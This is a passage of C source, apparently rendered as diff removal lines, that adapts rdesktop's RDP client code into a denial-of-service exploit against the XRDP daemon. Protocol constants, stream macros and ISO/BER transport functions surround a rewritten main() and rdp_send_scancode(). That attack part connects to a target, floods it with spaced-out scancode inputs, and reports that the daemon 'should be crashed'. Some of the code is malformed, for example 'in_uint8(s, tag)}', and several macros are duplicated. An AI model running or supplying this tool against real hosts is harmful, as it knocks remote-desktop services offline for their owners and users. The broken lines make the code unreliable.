0xD0, /* Connection Confirm */ - ISO_PDU_DR = 0x80, /* Disconnect Request */ - ISO_PDU_DT = 0xF0, /* Data */ - ISO_PDU_ER = 0x70 /* Error */ -}; - -/* MCS PDU codes */ -enum MCS_PDU_TYPE -{ - MCS_EDRQ = 1, /* Erect Domain Request */ - MCS_DPUM = 8, /* Disconnect Provider Ultimatum */ - MCS_AURQ = 10, /* Attach User Request */ - MCS_AUCF = 11, /* Attach User Confirm */ - MCS_CJRQ = 14, /* Channel Join Request */ - MCS_CJCF = 15, /* Channel Join Confirm */ - MCS_SDRQ = 25, /* Send Data Request */ - MCS_SDIN = 26 /* Send Data Indication */ -}; - -#define MCS_CONNECT_INITIAL 0x7f65 -#define MCS_CONNECT_RESPONSE 0x7f66 -#define BER_TAG_BOOLEAN 1 -#define BER_TAG_INTEGER 2 -#define BER_TAG_OCTET_STRING 4 -#define BER_TAG_RESULT 10 -#define MCS_TAG_DOMAIN_PARAMS 0x30 -#define MCS_GLOBAL_CHANNEL 1003 - -/* RDP secure transport constants */ -#define SEC_RANDOM_SIZE 32 -#define SEC_MODULUS_SIZE 64 -#define SEC_PADDING_SIZE 8 -#define SEC_EXPONENT_SIZE 4 -#define SEC_CLIENT_RANDOM 0x0001 -#define SEC_ENCRYPT 0x0008 -#define SEC_LOGON_INFO 0x0040 -#define SEC_LICENCE_NEG 0x0080 -#define SEC_TAG_SRV_INFO 0x0c01 -#define SEC_TAG_SRV_CRYPT 0x0c02 -#define SEC_TAG_SRV_3 0x0c03 -#define SEC_TAG_CLI_INFO 0xc001 -#define SEC_TAG_CLI_CRYPT 0xc002 -#define SEC_TAG_PUBKEY 0x0006 -#define SEC_TAG_KEYSIG 0x0008 -#define SEC_RSA_MAGIC 0x31415352 /* RSA1 */ - -/* RDP licensing constants */ -#define LICENCE_TOKEN_SIZE 10 -#define LICENCE_HWID_SIZE 20 -#define LICENCE_SIGNATURE_SIZE 16 -#define LICENCE_TAG_DEMAND 0x0201 -#define LICENCE_TAG_AUTHREQ 0x0202 -#define LICENCE_TAG_ISSUE 0x0203 -#define LICENCE_TAG_REISSUE 0x0204 -#define LICENCE_TAG_PRESENT 0x0212 -#define LICENCE_TAG_REQUEST 0x0213 -#define LICENCE_TAG_AUTHRESP 0x0215 -#define LICENCE_TAG_RESULT 0x02ff -#define LICENCE_TAG_USER 0x000f -#define LICENCE_TAG_HOST 0x0010 - -/* RDP PDU codes */ -enum RDP_PDU_TYPE -{ - RDP_PDU_DEMAND_ACTIVE = 1, - RDP_PDU_CONFIRM_ACTIVE = 3, - RDP_PDU_DEACTIVATE = 6, - RDP_PDU_DATA = 7 -}; - -enum RDP_DATA_PDU_TYPE -{ - RDP_DATA_PDU_UPDATE = 2, - RDP_DATA_PDU_CONTROL = 20, - RDP_DATA_PDU_POINTER = 27, - RDP_DATA_PDU_INPUT = 28, - RDP_DATA_PDU_SYNCHRONISE = 31, - RDP_DATA_PDU_BELL = 34, - RDP_DATA_PDU_LOGON = 38, - RDP_DATA_PDU_FONT2 = 39 -}; - -enum RDP_CONTROL_PDU_TYPE -{ - RDP_CTL_REQUEST_CONTROL = 1, - RDP_CTL_GRANT_CONTROL = 2, - RDP_CTL_DETACH = 3, - RDP_CTL_COOPERATE = 4 -}; - -enum RDP_UPDATE_PDU_TYPE -{ - RDP_UPDATE_ORDERS = 0, - RDP_UPDATE_BITMAP = 1, - RDP_UPDATE_PALETTE = 2, - RDP_UPDATE_SYNCHRONIZE = 3 -}; - -enum RDP_POINTER_PDU_TYPE -{ - RDP_POINTER_MOVE = 3, - RDP_POINTER_COLOR = 6, - RDP_POINTER_CACHED = 7 -}; - -enum RDP_INPUT_DEVICE -{ - RDP_INPUT_SYNCHRONIZE = 0, - RDP_INPUT_CODEPOINT = 1, - RDP_INPUT_VIRTKEY = 2, - RDP_INPUT_SCANCODE = 4, - RDP_INPUT_MOUSE = 0x8001 -}; - -/* Device flags */ -#define KBD_FLAG_RIGHT 0x0001 -#define KBD_FLAG_EXT 0x0100 -#define KBD_FLAG_QUIET 0x1000 -#define KBD_FLAG_DOWN 0x4000 -#define KBD_FLAG_UP 0x8000 - -/* These are for synchronization; not for keystrokes */ -#define KBD_FLAG_SCROLL 0x0001 -#define KBD_FLAG_NUMLOCK 0x0002 -#define KBD_FLAG_CAPITAL 0x0004 - -/* See T.128 */ -#define RDP_KEYPRESS 0 -#define RDP_KEYRELEASE (KBD_FLAG_DOWN | KBD_FLAG_UP) -#define MOUSE_FLAG_MOVE 0x0800 -#define MOUSE_FLAG_BUTTON1 0x1000 -#define MOUSE_FLAG_BUTTON2 0x2000 -#define MOUSE_FLAG_BUTTON3 0x4000 -#define MOUSE_FLAG_BUTTON4 0x0280 -#define MOUSE_FLAG_BUTTON5 0x0380 -#define MOUSE_FLAG_DOWN 0x8000 - -/* Raster operation masks */ -#define ROP2_S(rop3) (rop3 & 0xf) -#define ROP2_P(rop3) ((rop3 & 0x3) | ((rop3 & 0x30) >> 2)) -#define ROP2_COPY 0xc -#define ROP2_XOR 0x6 -#define ROP2_AND 0x8 -#define ROP2_NXOR 0x9 -#define ROP2_OR 0xe -#define MIX_TRANSPARENT 0 -#define MIX_OPAQUE 1 -#define TEXT2_VERTICAL 0x04 -#define TEXT2_IMPLICIT_X 0x20 - -/* RDP capabilities */ -#define RDP_CAPSET_GENERAL 1 -#define RDP_CAPLEN_GENERAL 0x18 -#define OS_MAJOR_TYPE_UNIX 4 -#define OS_MINOR_TYPE_XSERVER 7 -#define RDP_CAPSET_BITMAP 2 -#define RDP_CAPLEN_BITMAP 0x1C -#define RDP_CAPSET_ORDER 3 -#define RDP_CAPLEN_ORDER 0x58 -#define ORDER_CAP_NEGOTIATE 2 -#define ORDER_CAP_NOSUPPORT 4 -#define RDP_CAPSET_BMPCACHE 4 -#define RDP_CAPLEN_BMPCACHE 0x28 -#define RDP_CAPSET_CONTROL 5 -#define RDP_CAPLEN_CONTROL 0x0C -#define RDP_CAPSET_ACTIVATE 7 -#define RDP_CAPLEN_ACTIVATE 0x0C -#define RDP_CAPSET_POINTER 8 -#define RDP_CAPLEN_POINTER 0x08 -#define RDP_CAPSET_SHARE 9 -#define RDP_CAPLEN_SHARE 0x08 -#define RDP_CAPSET_COLCACHE 10 -#define RDP_CAPLEN_COLCACHE 0x08 -#define RDP_CAPSET_UNKNOWN 13 -#define RDP_CAPLEN_UNKNOWN 0x9C -#define RDP_SOURCE "MSTSC" - -/* Logon flags */ -#define RDP_LOGON_NORMAL 0x33 -#define RDP_LOGON_AUTO 0x8 - -/* Keymap flags */ -#define MapRightShiftMask (1<<0) -#define MapLeftShiftMask (1<<1) -#define MapShiftMask (MapRightShiftMask | MapLeftShiftMask) -#define MapRightAltMask (1<<2) -#define MapLeftAltMask (1<<3) -#define MapAltGrMask MapRightAltMask -#define MapRightCtrlMask (1<<4) -#define MapLeftCtrlMask (1<<5) -#define MapCtrlMask (MapRightCtrlMask | MapLeftCtrlMask) -#define MapRightWinMask (1<<6) -#define MapLeftWinMask (1<<7) -#define MapWinMask (MapRightWinMask | MapLeftWinMask) -#define MapNumLockMask (1<<8) -#define MapCapsLockMask (1<<9) -#define MapLocalStateMask (1<<10) -#define MapInhibitMask (1<<11) -#define MASK_ADD_BITS(var, mask) (var |= mask) -#define MASK_REMOVE_BITS(var, mask) (var &= ~mask) -#define MASK_HAS_BITS(var, mask) ((var & mask)>0) -#define MASK_CHANGE_BIT(var, mask, active) (var = ((var & ~mask) | (active ? mask : 0))) - -/* Parser state */ -typedef struct stream -{ - unsigned char *p; - unsigned char *end; - unsigned char *data; - unsigned int size; - - /* Offsets of various headers */ - unsigned char *iso_hdr; - unsigned char *mcs_hdr; - unsigned char *sec_hdr; - unsigned char *rdp_hdr; - -} - *STREAM; - -#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } -#define s_pop_layer(s,h) (s)->p = (s)->h; -#define s_mark_end(s) (s)->end = (s)->p; -#define s_check(s) ((s)->p <= (s)->end) -#define s_check_rem(s,n) ((s)->p + n <= (s)->end) -#define s_check_end(s) ((s)->p == (s)->end) -#if defined(L_ENDIAN) && !defined(NEED_ALIGN) -#define in_uint16_le(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } -#define in_uint32_le(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } -#define out_uint16_le(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } -#define out_uint32_le(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } -#else -#define in_uint16_le(s,v) { v = *((s)->p++); v += *((s)->p++) << 8; } -#define in_uint32_le(s,v) { in_uint16_le(s,v) \ - v += *((s)->p++) << 16; v += *((s)->p++) << 24; } -#define out_uint16_le(s,v) { *((s)->p++) = (v) & 0xff; *((s)->p++) = ((v) >> 8) & 0xff; } -#define out_uint32_le(s,v) { out_uint16_le(s, (v) & 0xffff); out_uint16_le(s, ((v) >> 16) & 0xffff); } -#endif -#if defined(B_ENDIAN) && !defined(NEED_ALIGN) -#define in_uint16_be(s,v) { v = *(uint16 *)((s)->p); (s)->p += 2; } -#define in_uint32_be(s,v) { v = *(uint32 *)((s)->p); (s)->p += 4; } -#define out_uint16_be(s,v) { *(uint16 *)((s)->p) = v; (s)->p += 2; } -#define out_uint32_be(s,v) { *(uint32 *)((s)->p) = v; (s)->p += 4; } -#define B_ENDIAN_PREFERRED -#define in_uint16(s,v) in_uint16_be(s,v) -#define in_uint32(s,v) in_uint32_be(s,v) -#define out_uint16(s,v) out_uint16_be(s,v) -#define out_uint32(s,v) out_uint32_be(s,v) -#else -#define next_be(s,v) v = ((v) << 8) + *((s)->p++); -#define in_uint16_be(s,v) { v = *((s)->p++); next_be(s,v); } -#define in_uint32_be(s,v) { in_uint16_be(s,v); next_be(s,v); next_be(s,v); } -#define out_uint16_be(s,v) { *((s)->p++) = ((v) >> 8) & 0xff; *((s)->p++) = (v) & 0xff; } -#define out_uint32_be(s,v) { out_uint16_be(s, ((v) >> 16) & 0xffff); out_uint16_be(s, (v) & 0xffff); } -#endif -#ifndef B_ENDIAN_PREFERRED -#define in_uint16(s,v) in_uint16_le(s,v) -#define in_uint32(s,v) in_uint32_le(s,v) -#define out_uint16(s,v) out_uint16_le(s,v) -#define out_uint32(s,v) out_uint32_le(s,v) -#endif -#define in_uint8(s,v) v = *((s)->p++); -#define in_uint8p(s,v,n) { v = (s)->p; (s)->p += n; } -#define in_uint8a(s,v,n) { memcpy(v,(s)->p,n); (s)->p += n; } -#define in_uint8s(s,n) (s)->p += n; -#define out_uint8(s,v) *((s)->p++) = v; -#define out_uint8p(s,v,n) { memcpy((s)->p,v,n); (s)->p += n; } -#define out_uint8a(s,v,n) out_uint8p(s,v,n); -#define out_uint8s(s,n) { memset((s)->p,0,n); (s)->p += n; } -#define SCANCODE_EXTENDED 0x80 -#define SCANCODE_KEY_44 0x2a -#define SCANCODE_CHAR_LSHIFT SCANCODE_KEY_44 -#define SCANCODE_KEY_57 0x36 -#define SCANCODE_CHAR_RSHIFT SCANCODE_KEY_57 -#define SCANCODE_KEY_58 0x1d -#define SCANCODE_CHAR_LCTRL SCANCODE_KEY_58 -#define SCANCODE_KEY_60 0x38 -#define SCANCODE_CHAR_LALT SCANCODE_KEY_60 -#define SCANCODE_KEY_62 (SCANCODE_EXTENDED | 0x38) -#define SCANCODE_CHAR_RALT SCANCODE_KEY_62 -#define SCANCODE_KEY_64 (SCANCODE_EXTENDED | 0x1d) -#define SCANCODE_CHAR_RCTRL SCANCODE_KEY_64 -#define SCANCODE_KEY_90 0x45 -#define SCANCODE_CHAR_NUMLOCK SCANCODE_KEY_90 -#define SCANCODE_KEY_110 0x1 -#define SCANCODE_CHAR_ESC SCANCODE_KEY_110 -#define SCANCODE_CHAR_LWIN (SCANCODE_EXTENDED | 0x5b) -#define SCANCODE_CHAR_RWIN (SCANCODE_EXTENDED | 0x5c) -#define s_push_layer(s,h,n) { (s)->h = (s)->p; (s)->p += n; } -#define s_pop_layer(s,h) (s)->p = (s)->h; -#define s_mark_end(s) (s)->end = (s)->p; -#define s_check(s) ((s)->p <= (s)->end) -#define s_check_rem(s,n) ((s)->p + n <= (s)->end) -#define s_check_end(s) ((s)->p == (s)->end) -#define RDP_ORDER_STANDARD 0x01 -#define RDP_ORDER_SECONDARY 0x02 -#define RDP_ORDER_BOUNDS 0x04 -#define RDP_ORDER_CHANGE 0x08 -#define RDP_ORDER_DELTA 0x10 -#define RDP_ORDER_LASTBOUNDS 0x20 -#define RDP_ORDER_SMALL 0x40 -#define RDP_ORDER_TINY 0x80 -#define MAX_TEXT 256 -#define MAX_DATA 256 - -enum RDP_ORDER_TYPE -{ - RDP_ORDER_DESTBLT = 0, - RDP_ORDER_PATBLT = 1, - RDP_ORDER_SCREENBLT = 2, - RDP_ORDER_LINE = 9, - RDP_ORDER_RECT = 10, - RDP_ORDER_DESKSAVE = 11, - RDP_ORDER_MEMBLT = 13, - RDP_ORDER_TRIBLT = 14, - RDP_ORDER_POLYLINE = 22, - RDP_ORDER_TEXT2 = 27 -}; - -typedef struct _POLYLINE_ORDER -{ - uint16 x; - uint16 y; - uint8 opcode; - uint8 fgcolour; - uint8 lines; - uint8 datasize; - uint8 data[MAX_DATA]; - -} -POLYLINE_ORDER; - -typedef struct _DESTBLT_ORDER -{ - uint16 x; - uint16 y; - uint16 cx; - uint16 cy; - uint8 opcode; - -} -DESTBLT_ORDER; - -typedef struct _PATBLT_ORDER -{ - uint16 x; - uint16 y; - uint16 cx; - uint16 cy; - uint8 opcode; - uint8 bgcolour; - uint8 fgcolour; - BRUSH brush; - -} -PATBLT_ORDER; - -typedef struct _SCREENBLT_ORDER -{ - uint16 x; - uint16 y; - uint16 cx; - uint16 cy; - uint8 opcode; - uint16 srcx; - uint16 srcy; - -} -SCREENBLT_ORDER; - -typedef struct _LINE_ORDER -{ - uint16 mixmode; - uint16 startx; - uint16 starty; - uint16 endx; - uint16 endy; - uint8 bgcolour; - uint8 opcode; - PEN pen; - -} -LINE_ORDER; - -typedef struct _RECT_ORDER -{ - uint16 x; - uint16 y; - uint16 cx; - uint16 cy; - uint8 colour; - -} -RECT_ORDER; - -typedef struct _DESKSAVE_ORDER -{ - uint32 offset; - uint16 left; - uint16 top; - uint16 right; - uint16 bottom; - uint8 action; - -} -DESKSAVE_ORDER; - -typedef struct _MEMBLT_ORDER -{ - uint8 colour_table; - uint8 cache_id; - uint16 x; - uint16 y; - uint16 cx; - uint16 cy; - uint8 opcode; - uint16 srcx; - uint16 srcy; - uint16 cache_idx; - -} -MEMBLT_ORDER; - - -typedef struct _TRIBLT_ORDER -{ - uint8 colour_table; - uint8 cache_id; - uint16 x; - uint16 y; - uint16 cx; - uint16 cy; - uint8 opcode; - uint16 srcx; - uint16 srcy; - uint8 bgcolour; - uint8 fgcolour; - BRUSH brush; - uint16 cache_idx; - uint16 unknown; - -} -TRIBLT_ORDER; - -typedef struct _TEXT2_ORDER -{ - uint8 font; - uint8 flags; - uint8 mixmode; - uint8 unknown; - uint8 fgcolour; - uint8 bgcolour; - uint16 clipleft; - uint16 cliptop; - uint16 clipright; - uint16 clipbottom; - uint16 boxleft; - uint16 boxtop; - uint16 boxright; - uint16 boxbottom; - uint16 x; - uint16 y; - uint8 length; - uint8 text[MAX_TEXT]; - -} -TEXT2_ORDER; - -typedef struct _RDP_ORDER_STATE -{ - uint8 order_type; - BOUNDS bounds; - - DESTBLT_ORDER destblt; - PATBLT_ORDER patblt; - SCREENBLT_ORDER screenblt; - LINE_ORDER line; - RECT_ORDER rect; - DESKSAVE_ORDER desksave; - MEMBLT_ORDER memblt; - TRIBLT_ORDER triblt; - POLYLINE_ORDER polyline; - TEXT2_ORDER text2; - -} -RDP_ORDER_STATE; -//End typedefs and structs - - -// Begin XRDP global variables -//mcs.c -uint16 mcs_userid; - -//xkeymap.c -#define KEYMAP_SIZE 0xffff+1 -#define KEYMAP_MASK 0xffff -#define KEYMAP_MAX_LINE_LENGTH 80 -extern Display *display; -extern BOOL enable_compose; -static BOOL keymap_loaded; -static key_translation keymap[KEYMAP_SIZE]; -static int min_keycode; -static uint16 remote_modifier_state = 0; -static void update_modifier_state(uint8 scancode, BOOL pressed); - -//license.c -static uint8 licence_key[16]; -static uint8 licence_sign_key[16]; -BOOL licence_issued = False; - -//rdp.c -extern uint16 mcs_userid; -extern BOOL bitmap_compression; -extern BOOL orders; -extern BOOL encryption; -extern BOOL desktop_save; -uint8 *next_packet; -uint32 rdp_shareid; - -//orders.c -extern uint8 *next_packet; -static RDP_ORDER_STATE order_state; - -//secure.c -extern int width; -extern int height; -extern BOOL encryption; -extern BOOL licence_issued; -static int rc4_key_len; -static RC4_KEY rc4_decrypt_key; -static RC4_KEY rc4_encrypt_key; -static uint8 sec_sign_key[16]; -static uint8 sec_decrypt_key[16]; -static uint8 sec_encrypt_key[16]; -static uint8 sec_decrypt_update_key[16]; -static uint8 sec_encrypt_update_key[16]; -static uint8 sec_crypted_random[SEC_MODULUS_SIZE]; - -//tcp.c -static int sock; -static struct stream in; -static struct stream out; -extern int tcp_port_rdp; - -//xwin.c -static int x_socket; -static int ix = 36; // We force the program to interact - // with X windows as little as possible - // with this counter. -//rdesktop.c -char title[32] = ""; -char username[16]; -char hostname[16]; -char keymapname[16]; -int keylayout = 0x409; -int width = 800; -int height = 600; -int tcp_port_rdp = TCP_PORT_RDP; -BOOL bitmap_compression = True; -BOOL sendmotion = True; -BOOL orders = True; -BOOL encryption = True; -BOOL desktop_save = True; -BOOL fullscreen = False; -BOOL grab_keyboard = True; -BOOL hide_decorations = False; -extern BOOL owncolmap; -// End global variables - - - -//Start function definitions -static BOOL mcs_recv_aucf(uint16 * mcs_userid); -static BOOL mcs_recv_cjcf(void); -static BOOL mcs_recv_connect_response(STREAM mcs_data); -static void rdp_send_synchronise(void); -static void mcs_send_aurq(void); -static void mcs_send_cjrq(uint16 chanid); -static void mcs_send_connect_initial(STREAM mcs_data); -static void mcs_send_edrq(void); -static void process_secondary_order(STREAM s); -static void process_update_pdu(STREAM s); -static STREAM rdp_recv(uint8 * type); -static void rdp_send_control(uint16 action); -static void rdp_send_fonts(uint16 seq); -static void rdp_send_confirm_active(void); -static void reverse(uint8 * p, int len); -STREAM sec_init(uint32 flags, int maxlen); -STREAM sec_recv(void); -STREAM tcp_init(int maxlen); -STREAM tcp_recv(int length); -int ui_select(int rdp_socket); -void * xmalloc(int size); -key_translation xkeymap_translate_key(uint32 keysym, unsigned int keycode, unsigned int state); -//End function definitions - - - -int main(int argc, char *argv[]) -{ - char server[64]; - char fullhostname[64]; - char domain[16]; - char password[16]; - char shell[128]; - char directory[32]; - BOOL prompt_password; - struct passwd *pw; - uint32 flags; - char *p; - int c; - int username_option = 0; - encryption = False; - sendmotion = False; - flags = RDP_LOGON_NORMAL; - prompt_password = False; - domain[0] = password[0] = shell[0] = directory[0] = 0; - strcpy(keymapname, "en-us"); - - if (argc == 1) - { - fprintf(stderr, "\n[=] Usage: %s \n\n", argv[0]); - return 0; - } - - strncpy(server, argv[1], sizeof(server)); - if(!rdp_connect(server, flags, domain, password, shell, directory)) - return 0; - - fprintf(stderr, "\n[=] Connected to %s\n", argv[1]); - fprintf(stderr, "[=] Hit CTRL-C if the progress bar stops.\n\n"); - - memset(password, 0, sizeof(password)); - rdp_main_loop(); - fprintf(stderr, "\n[=] Done. Check port 3389 on the remote host.\n\n"); - return 0; -} - - -void rdp_send_scancode(uint32 time, uint16 flags, uint8 scancode) -{ - update_modifier_state(scancode, !(flags & RDP_KEYRELEASE)); - int c1, c2 = 1; - scancode = '\x1e'; // 0x1e = 0x61 ("A" after parsing. - - fprintf(stderr, "\tBe patient! It takes about a minute, the RDP packets\n"); - fprintf(stderr, "\tneed to be sent spaced apart or the daemon discards them.\n\n"); - fprintf(stderr, "[=] Progress: "); - - for (c1 = 1 ; c1 < 100 ; c1++) - { - for (c2 = 1 ; c2 < 5 ; c2++) - { - //printf("Sending scancode=0x%x, flags=0x%x\n", scancode, flags); - rdp_send_input(time, RDP_INPUT_SCANCODE, flags, scancode, 0); - //scancode++; - } - - fprintf(stderr, "*"); - sleep(1); - } - - fprintf(stderr, "\n[=] The XRDP daemon on target host should be crashed.\n"); - rdp_disconnect(); - exit(1); -} - - -/* Output an ASN.1 BER header */ -static void -ber_out_header(STREAM s, int tagval, int length) -{ - if (tagval > 0xff) - { - out_uint16_be(s, tagval); - } - else - { - out_uint8(s, tagval); - } - - if (length >= 0x80) - { - out_uint8(s, 0x82); - out_uint16_be(s, length); - } - else - out_uint8(s, length); -} - -/* Output an ASN.1 BER integer */ -static void -ber_out_integer(STREAM s, int value) -{ - ber_out_header(s, BER_TAG_INTEGER, 2); - out_uint16_be(s, value); -} - - -/* Parse an ASN.1 BER header */ -static BOOL -ber_parse_header(STREAM s, int tagval, int *length) -{ - int tag, len; - - if (tagval > 0xff) - { - in_uint16_be(s, tag); - } - else - { - in_uint8(s, tag)} - - - if (tag != tagval) - { - error("expected tag %d, got %d\n", tagval, tag); - return False; - } - - - in_uint8(s, len); - - if (len & 0x80) - { - len &= ~0x80; - *length = 0; - while (len--) - next_be(s, *length); - } - else - *length = len; - - return s_check(s); -} - - - -void -ensure_remote_modifiers(uint32 ev_time, key_translation tr) -{ - /* If this key is a modifier, do nothing */ - switch (tr.scancode) - { - case SCANCODE_CHAR_LSHIFT: - case SCANCODE_CHAR_RSHIFT: - case SCANCODE_CHAR_LCTRL: - case SCANCODE_CHAR_RCTRL: - case SCANCODE_CHAR_LALT: - case SCANCODE_CHAR_RALT: - case SCANCODE_CHAR_LWIN: - case SCANCODE_CHAR_RWIN: - case SCANCODE_CHAR_NUMLOCK: - return; - default: - break; - } - - /* Shift. Left shift and right shift are treated as equal; either is fine. */ - if (MASK_HAS_BITS(tr.modifiers, MapShiftMask) - != MASK_HAS_BITS(remote_modifier_state, MapShiftMask)) - { - /* The remote modifier state is not correct */ - if (MASK_HAS_BITS(tr.modifiers, MapLeftShiftMask)) - { - /* Needs left shift. Send down. */ - rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LSHIFT); - } - else if (MASK_HAS_BITS(tr.modifiers, MapRightShiftMask)) - { - /* Needs right shift. Send down. */ - rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RSHIFT); - } - else - { - /* Should not use this modifier. Send up for shift currently pressed. */ - if (MASK_HAS_BITS(remote_modifier_state, MapLeftShiftMask)) - /* Left shift is down */ - rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LSHIFT); - else - /* Right shift is down */ - rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RSHIFT); - } - } - - /* AltGr */ - if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask) - != MASK_HAS_BITS(remote_modifier_state, MapAltGrMask)) - { - /* The remote modifier state is not correct */ - if (MASK_HAS_BITS(tr.modifiers, MapAltGrMask)) - { - /* Needs this modifier. Send down. */ - rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_RALT); - } - else - { - /* Should not use this modifier. Send up. */ - rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_RALT); - } - } - - /* NumLock */ - if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask) - != MASK_HAS_BITS(remote_modifier_state, MapNumLockMask)) - { - /* The remote modifier state is not correct */ - uint16 new_remote_state = 0; - - if (MASK_HAS_BITS(tr.modifiers, MapNumLockMask)) - { - - new_remote_state |= KBD_FLAG_NUMLOCK; - } - else - { - - } - - rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, new_remote_state, 0); - update_modifier_state(SCANCODE_CHAR_NUMLOCK, True); - } -} - - -#ifdef EGD_SOCKET -/* Read 32 random bytes from PRNGD or EGD socket (based on OpenSSL RAND_egd) */ -static BOOL -generate_random_egd(uint8 * buf) -{ - struct sockaddr_un addr; - BOOL ret = False; - int fd; - - fd = socket(AF_UNIX, SOCK_STREAM, 0); - if (fd == -1) - return False; - - addr.sun_family = AF_UNIX; - memcpy(addr.sun_path, EGD_SOCKET, sizeof(EGD_SOCKET)); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) - goto err; - - /* PRNGD and EGD use a simple communications protocol */ - buf[0] = 1; /* Non-blocking (similar to /dev/urandom) */ - buf[1] = 32; /* Number of requested random bytes */ - if (write(fd, buf, 2) != 2) - goto err; - - if ((read(fd, buf, 1) != 1) || (buf[0] == 0)) /* Available? */ - goto err; - - if (read(fd, buf, 32) != 32) - goto err; - - ret = True; - - err: - close(fd); - return ret; -} -#endif - - -/* Handles, for example, multi-scancode keypresses (which is not - possible via keymap-files) */ -BOOL -handle_special_keys(uint32 keysym, unsigned int state, uint32 ev_time, BOOL pressed) -{ - switch (keysym) - { - - - case XK_Break: - /* Send Break sequence E0 46 E0 C6 */ - if (pressed) - { - rdp_send_scancode(ev_time, RDP_KEYPRESS, - (SCANCODE_EXTENDED | 0x46)); - rdp_send_scancode(ev_time, RDP_KEYPRESS, - (SCANCODE_EXTENDED | 0xc6)); - } - /* No release sequence */ - return True; - - case XK_Pause: - /* According to MS Keyboard Scan Code - Specification, pressing Pause should result - in E1 1D 45 E1 9D C5. I'm not exactly sure - of how this is supposed to be sent via - RDP. The code below seems to work, but with - the side effect that Left Ctrl stays - down. Therefore, we release it when Pause - is released. */ - if (pressed) - { - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0); - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x1d, 0); - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x45, 0); - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xe1, 0); - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0x9d, 0); - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYPRESS, 0xc5, 0); - } - else - { - /* Release Left Ctrl */ - rdp_send_input(ev_time, RDP_INPUT_SCANCODE, RDP_KEYRELEASE, - 0x1d, 0); - } - return True; - - case XK_Meta_L: /* Windows keys */ - case XK_Super_L: - case XK_Hyper_L: - case XK_Meta_R: - case XK_Super_R: - case XK_Hyper_R: - if (pressed) - { - rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_LCTRL); - rdp_send_scancode(ev_time, RDP_KEYPRESS, SCANCODE_CHAR_ESC); - } - else - { - rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_ESC); - rdp_send_scancode(ev_time, RDP_KEYRELEASE, SCANCODE_CHAR_LCTRL); - } - return True; - } - return False; -} - - - - - -/* Send a self-contained ISO PDU */ -static void -iso_send_msg(uint8 code) -{ - STREAM s; - - s = tcp_init(11); - - out_uint8(s, 3); /* version */ - out_uint8(s, 0); /* reserved */ - out_uint16_be(s, 11); /* length */ - - out_uint8(s, 6); /* hdrlen */ - out_uint8(s, code); - out_uint16(s, 0); /* dst_ref */ - out_uint16(s, 0); /* src_ref */ - out_uint8(s, 0); /* class */ - - s_mark_end(s); - tcp_send(s); -} - -/* Receive a message on the ISO layer, return code */ -static STREAM -iso_recv_msg(uint8 * code) -{ - STREAM s; - uint16 length; - uint8 version; - - s = tcp_recv(4); - if (s == NULL) - return NULL; - - in_uint8(s, version); - if (version != 3) - { - error("TPKT v%d\n", version); - return NULL; - } - - in_uint8s(s, 1); /* pad */ - in_uint16_be(s, length); - - s = tcp_recv(length - 4); - if (s == NULL) - return NULL; - - in_uint8s(s, 1); /* hdrlen */ - in_uint8(s, *code); - - if (*code == ISO_PDU_DT) - { - in_uint8s(s, 1); /* eot */ - return s; - } - - in_uint8s(s, 5); /* dst_ref, src_ref, class */ - return s; -} - -/* Initialise ISO transport data packet */ -STREAM -iso_init(int length) -{ - STREAM s; - - s = tcp_init(length + 7); - s_push_layer(s, iso_hdr, 7); - - return s; -} - -/* Send an ISO data PDU */ -void -iso_send(STREAM s) -{ - uint16 length; - - s_pop_layer(s, iso_hdr); - length = s->end - s->p; - - out_uint8(s, 3); /* version */ - out_uint8(s, 0); /* reserved */ - out_uint16_be(s, length); - - out_uint8(s, 2); /* hdrlen */ - out_uint8(s, ISO_PDU_DT); /* code */ - out_uint8(s, 0x80); /* eot */ - - tcp_send(s); -} - -/* Receive ISO transport data packet */ -STREAM -iso_recv(void) -{ - STREAM s; - uint8 code; - - s = iso_recv_msg(&code); - if (s == NULL) - return NULL; - - if (code != ISO_PDU_DT) - { - error("expected DT, got 0x%x\n", code); - return NULL; - } - - return s; -} - -/* Establish a connection up to the ISO layer */ -BOOL -iso_connect(char *server) -{ - uint8 code; - - if (!tcp_connect(server)) - return False; - - iso_send_msg(ISO_PDU_CR); - - if (iso_recv_msg(&code) == NULL) - return False; - - if (code != ISO_PDU_CC) - { - error("expected CC, got 0x%x\n", code); - tcp_disconnect(); - return False; - } - - return True; -} - -/* Disconnect from the ISO layer */ -void -iso_disconnect(void) -{ - iso_send_msg(ISO_PDU_DR); - tcp_disconnect(); -} - - - -/* Generate a session key and RC4 keys, given client and server randoms */ -static void -licence_generate_keys(uint8 * client_key, uint8 * server_key, uint8 * client_rsa) -{ - uint8 session_key[48]; - uint8 temp_hash[48]; - - /* Generate session key - two rounds of sec_hash_48 */ - sec_hash_48(temp_hash, client_rsa, client_key, server_key, 65); - sec_hash_48(session_key, temp_hash, server_key, client_key, 65); - - /* Store first 16 bytes of session key, for generating signatures */ - memcpy(licence_sign_key, session_key, 16); - - /* Generate RC4 key */ - sec_hash_16(licence_key, &session_key[16], client_key, server_key); -} - - - 